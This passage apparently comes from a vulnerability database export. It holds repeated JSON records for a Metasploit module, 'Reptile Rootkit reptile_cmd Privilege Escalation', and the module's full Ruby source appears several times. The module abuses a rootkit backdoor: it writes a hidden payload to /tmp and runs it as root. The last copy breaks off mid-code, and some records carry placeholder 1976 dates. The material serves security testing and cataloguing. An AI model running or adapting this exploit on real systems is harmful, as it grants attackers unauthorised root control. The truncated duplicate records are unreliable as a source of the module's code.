Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-26T02:08:25", "history": [], "viewCount": 27, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "redhat", "idList": ["RHSA-2020:0605", "RHSA-2020:0601", "RHSA-2020:0595", "RHSA-2020:0593", "RHSA-2020:0592"]}, {"type": "kitploit", "idList": ["KITPLOIT:4779076850240797499"]}, {"type": "threatpost", "idList": ["THREATPOST:04ACAD235492D0B01F4F6E92CADC43FF"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4DDAA5E7BEF3372B85214346CF69C78D"]}, {"type": "thn", "idList": ["THN:DC209DD441842FCD2682680F22D67854", "THN:99A185A2BA5B1EE01BD7A633B37EA671"]}, {"type": "securelist", "idList": ["SECURELIST:B700542D10BA5EEA36C5D69A24B3C6EE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:2A70BF9D5A3FD2CCFD1BFF7AFC0A2C48"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0242-1"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-0578", "ELSA-2020-0568"]}, {"type": "jvn", "idList": ["JVN:15697526"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892118", "OPENVAS:1361412562310143549"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156532"]}], "modified": "2020-02-26T02:08:25"}, "score": {"value": 2.2, "vector": "NONE", "modified": "2020-02-26T02:08:25"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-26T02:08:25", "differentElements": ["modified", "published"], "edition": 54}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-26T10:01:18", "history": [], "viewCount": 28, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "redhat", "idList": ["RHSA-2020:0609", "RHSA-2020:0605", "RHSA-2020:0601", "RHSA-2020:0595", "RHSA-2020:0593", "RHSA-2020:0592"]}, {"type": "kitploit", "idList": ["KITPLOIT:4779076850240797499"]}, {"type": "threatpost", "idList": ["THREATPOST:04ACAD235492D0B01F4F6E92CADC43FF"]}, {"type": "cve", "idList": ["CVE-2020-9391", "CVE-2020-8793", "CVE-2020-9383"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4DDAA5E7BEF3372B85214346CF69C78D"]}, {"type": "thn", "idList": ["THN:DC209DD441842FCD2682680F22D67854", "THN:99A185A2BA5B1EE01BD7A633B37EA671"]}, {"type": "securelist", "idList": ["SECURELIST:B700542D10BA5EEA36C5D69A24B3C6EE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:2A70BF9D5A3FD2CCFD1BFF7AFC0A2C48"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0242-1"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-0568"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156532"]}], "modified": "2020-02-26T10:01:18"}, "score": {"value": 4.3, "vector": "NONE", "modified": "2020-02-26T10:01:18"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-26T10:01:18", "differentElements": ["modified", "published"], "edition": 55}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "f18553619b12944be84d546c5a109287", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-27T03:58:31", "history": [], "viewCount": 28, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "zdt", "idList": ["1337DAY-ID-34025", "1337DAY-ID-34024"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4634-1:FF078"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0245-1"]}, {"type": "centos", "idList": ["CESA-2020:0374"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:994D1B67FBA58F0C231E8DE0D7D180FC"]}, {"type": "redhat", "idList": ["RHSA-2020:0609", "RHSA-2020:0605", "RHSA-2020:0601"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-0577"]}, {"type": "ubuntu", "idList": ["USN-4278-3"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704633"]}, {"type": "exploitdb", "idList": ["EDB-ID:48140", "EDB-ID:48139"]}, {"type": "cve", "idList": ["CVE-2019-4000", "CVE-2019-3999", "CVE-2020-9391"]}, {"type": "kitploit", "idList": ["KITPLOIT:4779076850240797499"]}, {"type": "threatpost", "idList": ["THREATPOST:04ACAD235492D0B01F4F6E92CADC43FF"]}], "modified": "2020-02-27T03:58:31"}, "score": {"value": 5.9, "vector": "NONE", "modified": "2020-02-27T03:58:31"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-27T03:58:31", "differentElements": ["modified", "published"], "edition": 56}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-27T05:42:59", "history": [], "viewCount": 28, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "zdt", "idList": ["1337DAY-ID-34025", "1337DAY-ID-34024"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4634-1:FF078"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0245-1"]}, {"type": "centos", "idList": ["CESA-2020:0374"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:994D1B67FBA58F0C231E8DE0D7D180FC"]}, {"type": "redhat", "idList": ["RHSA-2020:0609", "RHSA-2020:0605", "RHSA-2020:0601"]}, {"type": "ubuntu", "idList": ["USN-4278-3"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-0577"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704633"]}, {"type": "exploitdb", "idList": ["EDB-ID:48140", "EDB-ID:48139"]}, {"type": "cve", "idList": ["CVE-2019-4000", "CVE-2019-3999", "CVE-2020-9391"]}, {"type": "kitploit", "idList": ["KITPLOIT:4779076850240797499"]}, {"type": "threatpost", "idList": ["THREATPOST:04ACAD235492D0B01F4F6E92CADC43FF"]}], "modified": "2020-02-27T05:42:59"}, "score": {"value": 5.9, "vector": "NONE", "modified": "2020-02-27T05:42:59"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-27T05:42:59", "differentElements": ["sourceData"], "edition": 57}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-28T06:08:58", "history": [], "viewCount": 28, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "redhat", "idList": ["RHSA-2020:0638", "RHSA-2020:0637"]}, {"type": "threatpost", "idList": ["THREATPOST:D4868E3B9B62DFBA16E6DD7067C0B09B"]}, {"type": "kitploit", "idList": ["KITPLOIT:6907864820465801313"]}, {"type": "amazon", "idList": ["ALAS-2020-1346", "ALAS-2020-1347"]}, {"type": "virtuozzo", "idList": ["VZA-2020-017"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-0630", "ELSA-2020-0633", "ELSA-2020-0631", "ELSA-2020-0632"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704635", "OPENVAS:1361412562310892120", "OPENVAS:1361412562310892119"]}, {"type": "zdt", "idList": ["1337DAY-ID-34025"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4634-1:FF078"]}, {"type": "cve", "idList": ["CVE-2019-17274", "CVE-2020-3173"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0245-1"]}], "modified": "2020-02-28T06:08:58"}, "score": {"value": 4.7, "vector": "NONE", "modified": "2020-02-28T06:08:58"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-02-28T06:08:58", "differentElements": ["sourceData"], "edition": 58}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-02-28T07:46:31", "history": [], "viewCount": 31, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "redhat", "idList": ["RHSA-2020:0638", "RHSA-2020:0637"]}, {"type": "threatpost", "idList": ["THREATPOST:D4868E3B9B62DFBA16E6DD7067C0B09B"]}, {"type": "kitploit", "idList": ["KITPLOIT:6907864820465801313"]}, {"type": "amazon", "idList": ["ALAS-2020-1346", "ALAS-2020-1347"]}, {"type": "virtuozzo", "idList": ["VZA-2020-017"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704635", "OPENVAS:1361412562310892120", "OPENVAS:1361412562310892119"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-0633", "ELSA-2020-0630", "ELSA-2020-0631", "ELSA-2020-0632"]}, {"type": "zdt", "idList": ["1337DAY-ID-34025"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4634-1:FF078"]}, {"type": "cve", "idList": ["CVE-2019-17274", "CVE-2020-3173"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0245-1"]}], "modified": "2020-02-28T07:46:31"}, "score": {"value": 5.6, "vector": "NONE", "modified": "2020-02-28T07:46:31"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return 